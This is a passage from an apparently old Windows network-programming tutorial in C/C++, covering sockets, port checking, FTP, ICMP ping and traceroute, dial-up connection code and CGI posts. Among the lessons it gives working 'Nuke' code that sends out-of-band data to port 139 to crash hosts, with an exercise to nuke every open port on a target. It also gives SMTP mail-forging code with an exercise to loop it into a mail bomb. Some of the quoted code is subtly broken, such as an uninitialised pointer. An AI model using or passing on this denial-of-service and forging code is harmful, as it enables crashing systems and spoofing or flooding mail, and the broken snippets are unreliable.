wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { wsock = WSAStartup(0x0101,&wsdata); struct hostent *h; h = gethostbyname("localhost"); MessageBoxPrintf(TEXT ("Hostname"),h->h_name); MessageBoxPrintf(TEXT ("IP Address"),inet_ntoa(*((struct in_addr *)h->h_addr))); WSACleanup(); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program utilizes the hostent structure, like we discussed earlier, and uses the gethostbyname(); function to get the name of the host were looking for. The hostent structure is filled up and we access the members h_name and h_addr and display them in Messagebox's. These aren't normal message box's as normal ones wouldn't be able to display the info for them so we added some extra code to create MessageBoxPrintf(); to emulate the consoles printf() function. 6.2 Portscan ======================================= /* <---- SOURCE CODE STARTS HERE ----> */ #include #include int CheckPortUDP(short int Port) { struct sockaddr_in client; WSADATA wsaData; int Busy = 0; int sock; if(WSAStartup(0x0101, &wsaData) == 0) { client.sin_family = AF_INET; client.sin_port = htons(Port); client.sin_addr.s_addr = inet_addr("127.0.0.1"); /* Check UDP Protocol */ sock = socket(AF_INET, SOCK_DGRAM, 0); Busy = (bind(sock, (SOCKADDR FAR *) &client,sizeof(SOCKADDR_IN)) == SOCKET_ERROR); if(Busy) WSACleanup(); } return(Busy); } int CheckPortTCP(short int Port) { struct sockaddr_in client; WSADATA wsaData; int Busy = 0; int sock; if(WSAStartup(0x0101, &wsaData) == 0) { client.sin_family = AF_INET; client.sin_port = htons(Port); client.sin_addr.s_addr = inet_addr("127.0.0.1"); sock = socket(AF_INET, SOCK_STREAM, 0); Busy = (connect(sock, (struct sockaddr *) &client,sizeof(client)) == 0); if(Busy) WSACleanup(); } return(Busy); } LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); if(CheckPortTCP(80)) MessageBox(0,"HTTP Server is running","HTTP",0); else MessageBox(0,"HTTP Server is down","HTTP",0); if(CheckPortUDP(13)) MessageBox(0,"DayTime Server is running","DayTime",0); else MessageBox(0,"DayTime Server is down","DayTime",0); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ Unlike the previous programs this one runs the winsock code as soon as we start it. We have 2 functions, 1. CheckPortUDP - Check if UDP port is open. 2. CheckPortTCP - Check if TCP port is open. These functions try to connect to the port that we pass to them in the WinMain function and if these ports are busy we get returned Busy otherwise we dont get returned Busy, its as easy as that! If we wanted we could add more code that checks more ports, port checking could do more than just tell us if a server is running (which is very useful on its own!) it could also tell us if a trojan is running on a remote computer or our own for that matter :). 6.3 Nuker ======================================= /* <---- PLEASE READ DISCLAIMER ----> */ /* <---- SOURCE CODE STARTS HERE ----> */ #include #include WSADATA wsdata; SOCKET sock; DWORD wsock; char *str; struct sockaddr_in Sa; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { wsock = WSAStartup(0x0101,&wsdata); sock = socket(PF_INET,SOCK_STREAM,0); Sa.sin_family = AF_INET; Sa.sin_addr.s_addr = inet_addr("127.0.0.1"); Sa.sin_port = htons(139); wsock = connect(sock,(struct sockaddr *)&Sa,sizeof(Sa)); str = "Hello World!"; send(sock,str,strlen(str),MSG_OOB); MessageBox(0,"Nuke Sent","Nuked",0); WSACleanup(); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This is the infamous (infamously lame) Nuke program. Port 139 is standard listening port for windows, Nuke merely sends OOB (Out Of Bound) data to this port which on some operating systems results in a crash. Many FTP servers and other such services are subceptible to a good nuking, all you do is change the port value to the service you wish to crash. For more information on Nuke and DoS attacks consult blacksun.box.sk. [ EXERCISES ] Write a program which first takes a hostname of a computer and returns the IP address, checks for open ports on the host, and nukes each port in turn. ________________________________________________________________________________________________________ 7.0 E-MAIL - SMTP ======================================= E-Mail is a very useful service and has made snail mail pointless (id rather get an internet mail bomb than a snail mail one!) E-mail is made up of two protocols 1. SMTP - For sending mail. 2. POP3 - For recieving mail. Since this is a basics tutorial we will only cover SMTP for the moment but that don't mean that we can't make it a bit more interesting... Any-1 thats familiar with SMTP can tell you its inherent flaws (after all bsrf's tutorial is smtp - the buggiest protocol.. or something like that). Most importantly of all it is possible to send mail from your e-mail account without giving a username or password, or read some-1 else's mail for that matter.. /* <---- SOURCE CODE STARTS HERE ----> */ #include #include WSADATA wsdata; SOCKET sock; DWORD wsock; struct hostent *H; char output[100]; int cnnct; char str[10000]; struct sockaddr_in Sa; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { WSAStartup (0x101, &wsdata); sock = socket(AF_INET, SOCK_STREAM,0); H = gethostbyname("mail.newbie.net"); Sa.sin_family = AF_INET; Sa.sin_port = htons(25); Sa.sin_addr.s_addr = *((unsigned long *) H->h_addr); cnnct = connect(sock,(struct sockaddr *) &Sa,sizeof(Sa)); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); strset(output,' '); strcpy(str,"HELO newbie.net\r\n"); cnnct = send(sock,str,strlen(str),0); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); strset(output,' '); strcpy(str,"MAIL FROM: \r\n"); cnnct = send(sock,str,strlen(str),0); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); strset(output,' '); strcpy(str,"RCPT TO: \r\n"); cnnct = send(sock,str,strlen(str),0); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); strset(output,' '); strcpy(str,"DATA\r\n"); cnnct = send(sock,str,strlen(str),0); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); strset(output,' '); strcpy(str,"TO: Ian Cosgrove\r\n"); cnnct = send(sock,str,strlen(str),0); strcpy(str,"FROM: Mail Forger.in\r\n"); cnnct = send(sock,str,strlen(str),0); strcpy(str,"DATE: 22 May 01 16:17 GMT\r\n"); cnnct = send(sock,str,strlen(str),0); strcpy(str,"MESSAGE_ID: <123456789>\r\n"); cnnct = send(sock,str,strlen(str),0); strcpy(str,"Hello World!\r\n"); cnnct = send(sock,str,strlen(str),0); strcpy(str,"From The Mail Forge Program\r\n"); cnnct = send(sock,str,strlen(str),0); strcpy(str,".\r\n"); cnnct = send(sock,str,strlen(str),0); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); strset(output,' '); strcpy(str,"QUIT\r\n"); cnnct = send(sock,str,strlen(str),0); cnnct = recv(sock,str,10000,0); sprintf(output,"recv %d str %s",cnnct,str); WSACleanup(); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program sends a series of commands at the SMTP server, if you are not familiar with the smtp protocol theres a good tutorial at the blacksun website which covers all of these commands and the basic idea behind this program. The result of this program is that an e-mail is sent to my e-mail address (cos125@hotmail.com), from lamer@newbie.net. The resulting e-mail would look like the following: --------------------------- --------------------------- TO: Ian Cosgrove FROM: Mail Forger DATE: 22 May 01 16:17 GMT MESSAGE_ID: <123456789> Hello World! From The Mail Forge Program --------------------------- --------------------------- And thats the SMTP program, replace my e-mail address with any-1 that you want and the address, lamer@newbie.net with anything, like santa@northpole.com, and the e-mail will be sent. [ EXERCISES ] Add a loop in the program so that it repeatedly sends e-mails to the same address... something like, for (i = 1; i<= 500 ; z++) { ... } ________________________________________________________________________________________________________ * NOTE - This method is known as mail bombing. ________________________________________________________________________________________________________ 8.0 WinInet - FTP ======================================= So far we have been using the Winsock for all of our programming, but there is another option in windows and its known as WinInet. WinInet is a collection of high level functions and deals with 3 main protocols; HTTP, FTP and Gopher. WinInet functions closely resemble windows file functions. For an example of using the WinInet API we are going to make an FTP client. FTP isn't very widely used anymore or if it is its used in the background of an application, like for downloading files from an FTP server in Internet Explorer. To the user when Internet Explorer begins downloading a file from a web site its hard to tell whether its using http's get command or using good ol' FTP. +------------------------+-------------------------+ | FTP function | Windows File Function | +------------------------+-------------------------+ | FtpCreateDirectory | CreateDirectory | +------------------------+-------------------------+ | FtpRemoveDirectory | RemoveDirectory | +------------------------+-------------------------+ | FtpSetCurrentDirectory | SetCurrentDirectory | +------------------------+-------------------------+ | FtpGetCurrentDirectory | GetCurrentDirectory | +------------------------+-------------------------+ FIG 5. - FTP and Windows File functions. As you can see from the above diagram FTP's commands in WinInet are very similiar to normal file commands in windows. This should make it easier to understand if you are already familiar with file management in windows. /* <---- SOURCE CODE STARTS HERE ----> */ #include #include // remember to include the WinInet header #include // FTP Download Definitions LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { BOOL bSuccess; HINTERNET hIntSession, hFtpSession; // Open an internet session hIntSession = ::InternetOpen ("FTP", INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, INTERNET_FLAG_ASYNC); // form a connection to www.microsoft.com hFtpSession = InternetConnect (hIntSession, "www.microsoft.com", INTERNET_DEFAULT_FTP_PORT, "anonymous", "cos125@hotmail.com", INTERNET_SERVICE_FTP, 0, 0); bSuccess = FtpSetCurrentDirectory( hFtpSession, ""); // Set the current directory on the ftp server, // where "" is the directory // Copy file from internet FtpGetFile (hFtpSession, "/disclaimer.txt", "/disclaimer.txt", TRUE, // copy file from server to disk FILE_ATTRIBUTE_NORMAL, FTP_TRANSFER_TYPE_ASCII, 0); InternetCloseHandle (hFtpSession); InternetCloseHandle (hIntSession); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program is quiet different to ones we have seen before. Most importantly to run this one you must link WININET.LIB to the project rather than Wsock32.lib, otherwise you'll get linker errors from your compiler. The main code is in the button down part as usual, to keep things familiar. In the begining we have a BOOL and two important parts which deal with the session. hIntSession and hFtpSession. These are used to refer to the connection to the host which in this case is www.microsoft.com. We pass several parameters to InternetOpen, first the name of the app "FTP", then the we just worry about standard parts like the internet type and ASyncronous. With InternetConnect we really form the connection by specifying information such as the host name, "www.microsoft.com" and tell the program to use the standard FTP port which is port 21, and provide the login information required by the ftp server. We are logging in with the standard anonymous account available on all public ftp servers. If you are connecting to a computer you have an account on you replace anonymous with your username and cos125@hotmail.com with your password.We then tell it what service we are using, ie; FTP. We set the current directory we wish to use on the FTP server, "" for the default directory, if a directory called home existed on the ftp server we could switch to that directory by placing home in the quotation marks, "home", and we pass a handle to the current ftp session, hFtpSession. The FtpGetFile() functions structure is quiet similiar, we specify the handle then give the name of the file we wish to download, this is followed by the name we want for the file when it is downloaded onto the computer. If I wanted to download disclaimer.txt onto my computer and have its name as discoblah.txt when it got here i would set the first of these parameters to disclaimer.txt and the second one to discoblah.txt. We set the files attributes to normal and then we specify the transfer type. Files from FTP servers can be downloaded in more than one way, ascii or binary. We are only downloading an ascii text file right now so we set it to FTP_TRANSFER_TYPE_ASCII, however if we wanted a binary transmission, like we would for a computer program, we would set it to FTP_TRANSFER_TYPE_BINARY. To finish off we close the handles hFtpSession and hIntSession. [ EXCERCISES ] Write a program which uses multiple threads or ASynchronous sockets to simultaneously download multiple files from a server using a binary transfer. ________________________________________________________________________________________________________ 9.0 ANOTHER PROTOCOL - ICMP ======================================= Yes unfortunately we have to cover yet another one of these protocols, but don't worry this one is cool. ICMP stands for the Internet Control Message Protocol and is used for checking for errors on computers connected to the internet. This protocol isnt quite like TCP or UDP it more runs along side IP and kinda runs like a modified version of it. One of the most popular applications on the internet is run on ICMP, it is called Ping. /* <---- SOURCE CODE STARTS HERE ----> */ #include struct o { unsigned char Ttl,Tos,Flags,OptionsSize,*OptionsData; }; struct { DWORD Address; unsigned long Status,RoundTripTime; unsigned short DataSize,Reserved; void *Data; struct o Options; } E; HANDLE hIP;WSADATA wsa;HANDLE hIcmp;DWORD *dwIPAddr;struct hostent *phostent; DWORD d;char aa[100];struct o I; HANDLE ( WINAPI *pIcmpCreateFile )( VOID ); BOOL ( WINAPI *pIcmpCloseHandle )( HANDLE ); DWORD (WINAPI *pIcmpSendEcho)(HANDLE,DWORD,LPVOID,WORD,LPVOID,LPVOID,DWORD,DWORD); int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrev,LPSTR lpCmd,int nShow ) { hIcmp = LoadLibrary( "ICMP.DLL" ); WSAStartup( 0x0101, &wsa ); phostent = gethostbyname( "www.microsoft.com"); dwIPAddr = (DWORD *)( *phostent->h_addr_list ); pIcmpCreateFile=GetProcAddress( hIcmp,"IcmpCreateFile"); pIcmpCloseHandle=GetProcAddress( hIcmp,"IcmpCloseHandle"); pIcmpSendEcho =GetProcAddress( hIcmp,"IcmpSendEcho" ); hIP = pIcmpCreateFile(); I.Ttl=6; pIcmpSendEcho(hIP,*dwIPAddr,0,0,&I,&E,sizeof(E),8000 ); d=E.Address; phostent = gethostbyaddr((char *)&d,4,PF_INET); sprintf(aa,"gethostbyaddr %p",phostent ); MessageBox(0,aa,aa,0); if ( phostent != 0 ) MessageBox(0,phostent->h_name,"hi",0); wsprintf(aa,"RTT: %dms,TTL:%d", E.RoundTripTime,E.Options.Ttl ); MessageBox(0,aa,"hi",0); pIcmpCloseHandle( hIP ); FreeLibrary( hIcmp ); WSACleanup(); } /* <---- SOURCE CODE ENDS HERE ----> */ First off this ain't my own code, I downloaded this code off a website and if you think the coding style is kinda messy, well I agree with you (bear in mind I have already cleaned it up a bit). Unfortunately I couldn't compile and run this code on my computer :( , judging from the fact that almost evry ping and ICMP program on the internet that relies on the ICMP dll looks like this one im guessing it has something to do with my compiler or my version of windblows. Anyway the program specifies some information at the start, like the ttl (time to live) and so on, which it will use later and we build a structure. We then state some usual winsock variables and skip onto the WinMain function. We load the ICMP library directly because microsoft din't release a .lib file for the bloody thing :). We then call phostent and pass the host name www.microsoft.com to the gethostbyname() function. This is closely followed by initialising 3 pointers to functions to the address's of related functions. 1. pIcmpCreateFile - IcmpCreateFile 2. pIcmpCloseHandle - IcmpCloseHandle 3. pIcmpSendEcho - IcmpSendEcho We then pass a handle to hIP and set the ttl to 60. The structure I contains fields of the IP header, which we are able to alter. The main function is pIcmpSendEcho (unless ya want to count WinMain), it has 8 parameters. 1. hIP - Handle from IcmpCreateFile(). 2. dwIPAddr - Destination IP address. 3. 0 - Pointer to buffer to send. 4. 0 - Size of buffer in bytes. 5. &I - Request options. 6. &E - Reply buffer. 7. sizeof(E) - The size of the reply buffer. 8. 8000 - Time to wait in milliseconds. We then print information about the ping like round trip time and the ttl of the return packet. We finish by unloading the icmp dll and WSACleanup() after us. Another application of ICMP is called tracetoute. In traceroute we ping a host but we start off with the ttl = 1. This ICMP packet gets to the first router and is decremented. The ttl is then 0 and the router sends back an error message telling us that it dropped our packet. We then send a packet with the ttl = 2 and it is dropped by the second router and again an error message is returned. We keep on sending the ping putting the ttl up by one each time until we reach the host we are pinging. By saving the IP address's and host names contained in the error messages from the routers we can view the route the packet takes from us to the host we are tracing. This is traceroute. /* <---- SOURCE CODE STARTS HERE ----> */ #include #include void abc(char *p) { FILE *fp=fopen("z.txt","a+"); fprintf(fp,"%s\n",p); fclose(fp); } struct o { unsigned char Ttl;unsigned char a[7]; }; struct { DWORD Address; unsigned long Status,RoundTripTime; unsigned char a[8]; struct o Options; } E; HANDLE hIP;WSADATA wsa;HANDLE hIcmp;DWORD *dwIPAddr;struct hostent *phostent; DWORD d;char aa[100];struct o I;char bb[100];int z; HANDLE ( WINAPI *pIcmpCreateFile )( VOID ); BOOL ( WINAPI *pIcmpCloseHandle )( HANDLE ); DWORD (WINAPI *pIcmpSendEcho) (HANDLE,DWORD,LPVOID,WORD, LPVOID, LPVOID,DWORD,DWORD); int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmd,int nShow ) { hIcmp = LoadLibrary( "ICMP.DLL" ); WSAStartup( 0x0101, &wsa ); pIcmpCreateFile=GetProcAddress( hIcmp,"IcmpCreateFile"); pIcmpCloseHandle=GetProcAddress( hIcmp,"IcmpCloseHandle"); pIcmpSendEcho =GetProcAddress( hIcmp,"IcmpSendEcho" ); hIP = pIcmpCreateFile(); for ( z = 1; z<= 20 ; z++) { I.Ttl=(unsigned char)z; phostent = gethostbyname( "www.neca.com"); dwIPAddr = (DWORD *)( *phostent->h_addr_list ); pIcmpSendEcho(hIP,*dwIPAddr,0,0,&I,&E,sizeof(E),8000 ); d=E.Address; phostent = gethostbyaddr((char *)&d,4,PF_INET); if ( phostent != 0) strcpy(aa,phostent->h_name) ; else strcpy(aa,"no host name"); wsprintf(bb," RTT: %dms, TTL: %d", E.RoundTripTime, E.Options.Ttl ); strcat(aa,bb); abc(aa); if ( E.Options.Ttl ) break; } MessageBox(0,"over","hi",0); pIcmpCloseHandle( hIP ); FreeLibrary( hIcmp ); WSACleanup(); } /* <---- SOURCE CODE ENDS HERE ----> */ So this is traceroute (very useful for discovering network trust issues and for diagnostics). [ Excercises ] Create a program which pings a host multiple times in any way you want, then compare the different routes. ________________________________________________________________________________________________________ 10.0 OTHER INTERNET CODE ======================================= Some times you need more than just the common winsock programming so I decided to add this section, its a bit off the mark of the tutorial but still it might come in handy. 10.1 INTERNET CONNECTIONS ======================================= The first program were going to look at is Hangup.cpp which was programmed by senna spy, all of his original comments are included and no code is altered so im just going to give you the code as it appears in the file which is available to download from the net. /* <---- SOURCE CODE STARTS HERE ----> */ ///// // // Copyright (C), April, 06 - 2000, By Senna Spy - ICQ UIN: 3973927 // // Senna Spy Programmer Official WebSite: // // http://sennaspy.cjb.net // http://w3.to/sennaspy // http://sennaspy.tsx.org // http://www.sennaspy.hpg.com.br // // HangUpConnections() // // Close All Internet Connections // ///// #include #define MAX_CONNECTIONS 128 ////////////////////////////////// // // // HangUpConnections() Function // // // ////////////////////////////////// void HangUpConnections() { // Variables RASCONN rcConnection[ MAX_CONNECTIONS ]; DWORD dwBufferSize; DWORD dwTotalConnections; int nLoop; // Set Buffer Size rcConnection[0].dwSize = sizeof( RASCONN ); dwBufferSize = MAX_CONNECTIONS * sizeof( RASCONN ); // I can Enumerate Connections ? if( RasEnumConnections( rcConnection, &swBufferSize, &dwTotalConnections ) ) return; // There is Connections ? if( dwTotalConnections ) { // Looking All Conections for( nLoop = 0; nLoop < (int) dwTotalConnections; nLoop ++) { // Check Status RASCONNSTATUS rcsStatus; rcsStatus.dwSize = sizeof( RASCONNSTATUS ); // Don't OK ? if( RasGetConnectStatus( rcConnection[ nLoop ].hrasconn, &rcsStatus ) ) break; // Is Connected ? if( rcsStatus.rasconnstate == RASCS_Connected ) { // Close Connection... if( RasHangUp( rcConnection[ nLoop ].hrasconn ) ) break; } } } } /* <---- SOURCE CODE ENDS HERE ----> */ This program includes the ras.h header file, which is in charge of internet connections and has to be included to interact with connections. The main function is HangUpConnections() and all the code takes place here. First we set the buffer size that will be used and then we check if we can enumerate internet connections. If there are internet connections present we loop trough them and check if were connected. If it turns out that there is a connection present we then close it. Heres some more code utilizing ras.h and again no this one isn't by me either. /* <---- SOURCE CODE STARTS HERE ----> */ //// // // Check for Internet Connection // // Windows 95, 98 and NT Compatible // Proxy (Client) Not Compatible // // Copyright (C), 14/02/2000, By Marcos Velasco // // http://icqpassword.cjb.net // ///// #include bool IsConnected() { LPRASCONN TRasCon; RASCONNSTATUS Tstatus; DWORD lg; DWORD lpcon; bool lReturn; TRasCon->dwSize = 412; lg = 256 * TRasCon->dwSize; lReturn = false; if( RasEnumConnections(TRasCon, &lg, &lpcon) == 0 ) { Tstatus.dwSize = 160; RasGetConnectStatus(TRasCon->hrasconn, &Tstatus); lReturn = ( Tstatus.rasconnstate == 0x2000 ); } return( lReturn ); } // Example: if( IsConnected() ) // It's OK.... Connected.. :-) else // Not Connected.. :-( /* <---- SOURCE CODE ENDS HERE ----> */ Like the previous code this one I downloaded from the net and has not been altered by me in any way. This code is quiet similiar to the last one and it leaves you room to add code to deal with the connection, this piece kind of reminds me of the port scanner earlier, it checks whether the connection is present first, like the scanner checked if the port was busy and then leaves you open to add messages to the user. ________________________________________________________________________________________________________ 10.2 CGI Programming ======================================= CGI stands for the Comon Gateway Interface. On web sites we can have programs that provide a service to users. These programs can be anything from guest books and chat rooms to search engines and e-mail programs, such as hotmail.com's web interface or the Alta Vista search engine. These programs can be written in any language you want, c++, perl, vb and any others, but how does the user communicate with the program? Websites tend to use forms to collect the information on say for example, a guestbook. But how does the information get from the form to the program? This is when cgi is used. In the following example we are going to register a website with the webcrawler search engine. /* <---- SOURCE CODE STARTS HERE ----> */ #include #include WSADATA wsdata; SOCKET sock; DWORD wsock; struct sockaddr_in Sa; long cnnct; char output[100]; char msge[1000],str[10000]; int i; struct hostent *h; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { wsock = WSAStartup(0x0101,&wsdata); sprintf(output,"WSAStartup..wsock = %ld..wsdata=%p",wsock,wsdata); MessageBox(0,output,"Winsock",0); sock = socket(AF_INET,SOCK_STREAM,0); sprintf(output,"Socket = %ld..",sock); MessageBox(0,output,"Socket",0); h = gethostbyname("info.webcrawler.com"); Sa.sin_family = AF_INET; Sa.sin_port = htons(80); Sa.sin_addr.s_addr=*((unsigned long *) h->h_addr); cnnct = connect(sock,(struct sockaddr *)&Sa,sizeof(Sa)); sprintf(output,"Connect = %ld",cnnct); MessageBox(0,output,"Connect",0); strcpy(msge,"POST /cgi-bin/addURL.cgi HTTP/1.0\r\n"); strcat(msge,"Content-type: application/x-www-form-urlencoded\r\n"); strcat(msge,"Content-length: 41\r\n"); strcat(msge,"\r\n"); strcat(msge,"URLS=http://blacksun.box.sk"); MessageBox(0,msge,"Sent",0); cnnct = send(sock,msge,strlen(msge),0); sprintf(output,"Send Post=%ld",cnnct); MessageBox(0,output,"Send Post",0); i = 1; while(i !=0) { i = recv(sock,str,sizeof(str),0); sprintf(output,"i = %d",i); MessageBox(0,output,"Update",0); } MessageBox(0,"Code Complete","Ending...",0); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program is very familiar at this point. A search engine requires a certain amount of information before adding a site to its list to search. In the program we copy this information to msge and send this to the server trough the post method. In this program we add blacksun.box.sk to the list of sites to search, replace that site in the program with the address you want. Of course what else do we do with search engines? The following program search's for "blacksun security" on the yahoo search engine. /* <---- SOURCE CODE STARTS HERE ----> */ #include #include void outtie(char *p) { FILE *fp=fopen("SearchLog.txt","a+"); fprintf(fp,"%s\n",p); fclose(fp); } WSADATA wsdata; SOCKET sock; DWORD wsock; struct sockaddr_in Sa; long cnnct; char output[100]; char msge[1000],str[10000]; int i; struct hostent *h; char Headers[]="HTTP/1.0\r\n""User-Agent:AuthClient\r\n""Accept:*/*\r\n"; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI 